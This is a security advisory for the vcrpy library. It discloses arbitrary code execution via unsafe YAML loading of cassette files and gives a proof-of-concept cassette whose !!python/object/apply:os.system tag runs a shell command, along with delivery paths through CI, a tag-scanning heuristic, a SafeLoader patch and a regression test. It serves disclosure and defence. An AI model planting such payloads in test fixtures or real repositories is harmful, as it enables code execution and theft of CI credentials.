GHSA-rpj2-4hq8-938g
VCR.py: Arbitrary code execution via unsafe YAML deserialization of cassette files
Details
### Summary
vcrpy deserializes YAML cassette files with PyYAML's object-constructing loader (`yaml.CLoader` / `yaml.Loader`) instead of the safe loader (`yaml.CSafeLoader` / `yaml.SafeLoader`). A cassette containing a `!!python/object/apply:` (or similar) tag therefore executes arbitrary Python code the moment the cassette is loaded — including through the normal `VCR().use_cassette()` path, before any HTTP interaction is replayed.
This is **not** limited to environments lacking the libYAML C extension. `CLoader` uses the C parser but PyYAML's full Python *constructor*, so Python object tags execute under `CLoader` exactly as under the pure-Python `Loader`. Confirmed against vcrpy 8.1.1 + PyYAML 6.0.3 with `CLoader` active.
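The loader difference can be observed with a harmless stand-in payload. The sketch below is illustrative only: it assumes PyYAML is installed and swaps `os.system` for the built-in `len`, so the only "code execution" is a side-effect-free function call. `BENIGN_TAGGED_DOC` and `try_load` are names made up for this example and are not part of vcrpy or PyYAML.

```python
import yaml

# Harmless stand-in for an attack payload: the tag asks the loader to call
# builtins.len("abc") while constructing the document.
BENIGN_TAGGED_DOC = '_x: !!python/object/apply:builtins.len ["abc"]\n'

# Prefer the C-accelerated classes when libYAML is available, falling back
# to the pure-Python ones otherwise.
UnsafeLoader = getattr(yaml, "CLoader", yaml.Loader)
SafeLoader = getattr(yaml, "CSafeLoader", yaml.SafeLoader)


def try_load(document, loader):
    """Return ("ok", data) on success or ("rejected", error class name)."""
    try:
        return "ok", yaml.load(document, Loader=loader)
    except yaml.constructor.ConstructorError as exc:
        return "rejected", type(exc).__name__


# The object-constructing loader calls len(); the safe loader refuses the tag.
unsafe_result = try_load(BENIGN_TAGGED_DOC, UnsafeLoader)
safe_result = try_load(BENIGN_TAGGED_DOC, SafeLoader)
print(unsafe_result)
print(safe_result)
```

If the first result carries the value computed by `len`, the loader has invoked a Python callable named in the document, which is the same mechanism the real payload relies on.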
### Affected component
- `vcr/serializers/yamlserializer.py`: `deserialize()` → `yaml.load(cassette_string, Loader=Loader)` where `Loader` is `CLoader`/`Loader`. Reached on **every** cassette load.
- `vcr/migration.py` (~line 107): `yaml.load(preprocess_yaml(...), Loader=Loader)`. A second sink reached when the migration tool is run on a `.yaml` file. `preprocess_yaml()` only strips three known legacy tags, so other tags still execute.
Present in all releases inspected, 1.0.0 through 8.1.1.
### Proof of concept
```python
import vcr, requests

# Attacker-supplied cassette. The payload sits in an ignored top-level key
# so the rest of the cassette stays valid; it fires during load.
open("evil.yaml", "w").write("""interactions:
- request:
    body: null
    headers: {Accept: ['*/*']}
    method: GET
    uri: http://example.com/
  response:
    body: {string: ok}
    headers: {Content-Type: ['text/plain']}
    status: {code: 200, message: OK}
_x: !!python/object/apply:os.system ['touch /tmp/VCRPY_YAML_RCE']
version: 1
""")

with vcr.use_cassette("evil.yaml"):   # <-- /tmp/VCRPY_YAML_RCE created here
    requests.get("http://example.com/")
```
Loading the cassette creates `/tmp/VCRPY_YAML_RCE`, demonstrating arbitrary command execution. Any Python callable can be invoked this way.
### Impact
Arbitrary code execution in the process that loads the cassette, with that process's full privileges. Realistic delivery paths:
- A malicious cassette added in a pull request and loaded when CI runs the tests.
- A poisoned shared test-fixture repository or cassette artifact store.
- "Updated recorded HTTP fixtures" social-engineering.
Because cassettes are typically loaded by test suites in CI/CD and on developer machines, the exposed secrets are exactly the high-value ones in those environments: CI deployment credentials, cloud IAM roles, registry/publishing tokens, and source access.
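Since each delivery path involves a cassette file arriving from outside, a reviewer or CI step could pre-screen cassettes as plain text before anything parses them. The following is a heuristic sketch under stated assumptions, not a substitute for the patch: `find_suspicious_cassettes` and the `SUSPICIOUS` pattern are hypothetical names, the file extensions are assumed, and a match inside a recorded response body would be a false positive.

```python
import re
import tempfile
from pathlib import Path

# Heuristic patterns: the "!!python/..." shorthand, the fully spelled-out tag
# URI, and %TAG directives, which can redefine tag handles and hide a payload.
SUSPICIOUS = re.compile(
    r"!!python/|tag:yaml\.org,2002:python/|^%TAG\b", re.MULTILINE
)


def find_suspicious_cassettes(root):
    """Return sorted paths of .yaml/.yml files under root matching SUSPICIOUS."""
    hits = []
    for path in Path(root).rglob("*"):
        if path.suffix not in {".yaml", ".yml"} or not path.is_file():
            continue
        # Read as text only; the file is never handed to a YAML parser.
        text = path.read_text(encoding="utf-8", errors="replace")
        if SUSPICIOUS.search(text):
            hits.append(path)
    return sorted(hits)


# Usage example on a throwaway directory.
with tempfile.TemporaryDirectory() as tmp:
    (Path(tmp) / "clean.yaml").write_text("interactions: []\nversion: 1\n")
    (Path(tmp) / "tagged.yaml").write_text(
        "_x: !!python/object/apply:os.system ['true']\nversion: 1\n"
    )
    flagged = [p.name for p in find_suspicious_cassettes(tmp)]

print(flagged)
```

Scanning text rather than parsing keeps the check itself from becoming a deserialization sink, at the cost of precision.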
### Patch
Use the safe loader in `vcr/serializers/yamlserializer.py`:
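```python
import yaml

# Prefer the libYAML-backed classes; fall back to pure Python if unavailable.
try:
    from yaml import CDumper as Dumper
    from yaml import CSafeLoader as Loader
except ImportError:
    from yaml import Dumper
    from yaml import SafeLoader as Loader


def deserialize(cassette_string):
    # The safe loader rejects !!python/... tags instead of constructing objects.
    return yaml.load(cassette_string, Loader=Loader)
```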
Apply the same `SafeLoader` change in `vcr/migration.py`.
This is backwards compatible: vcrpy cassettes only contain standard YAML (scalars/lists/maps plus `!!binary`, all supported by `SafeLoader`/`CSafeLoader`), so existing cassettes load unchanged. vcrpy's `serialize.deserialize()` already catches `yaml.constructor.ConstructorError`, so a Python-tagged cassette now surfaces as the existing "old cassette format" `ValueError` instead of executing.
Recommended hardening: add a regression test that loads a cassette containing `!!python/object/apply:os.system` and asserts a `ConstructorError`/`ValueError` and that no side effect occurs.
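One possible shape for that regression test is sketched below. It is a sketch under assumptions rather than vcrpy's actual test: `deserialize` is a local stand-in that mirrors the patched function, and the payload uses `os.mkdir` on a temporary path instead of `os.system`, so a regression would leave behind only an empty directory that is cleaned up with the temporary directory.

```python
import os
import tempfile

import yaml

# Same loader selection as the patched serializer.
Loader = getattr(yaml, "CSafeLoader", yaml.SafeLoader)


def deserialize(cassette_string):
    """Local stand-in mirroring the patched vcrpy function (an assumption)."""
    return yaml.load(cassette_string, Loader=Loader)


def test_python_tags_are_rejected():
    with tempfile.TemporaryDirectory() as tmp:
        marker = os.path.join(tmp, "marker")
        cassette = (
            "interactions: []\n"
            f"_x: !!python/object/apply:os.mkdir ['{marker}']\n"
            "version: 1\n"
        )
        try:
            deserialize(cassette)
        except yaml.constructor.ConstructorError:
            rejected = True
        else:
            rejected = False
        # The loader must refuse the tag, and the side effect must not occur.
        assert rejected
        assert not os.path.exists(marker)
```

In a real suite the stand-in would be replaced by an import of the project's own deserializer, and the expected exception would be whichever one that code path surfaces.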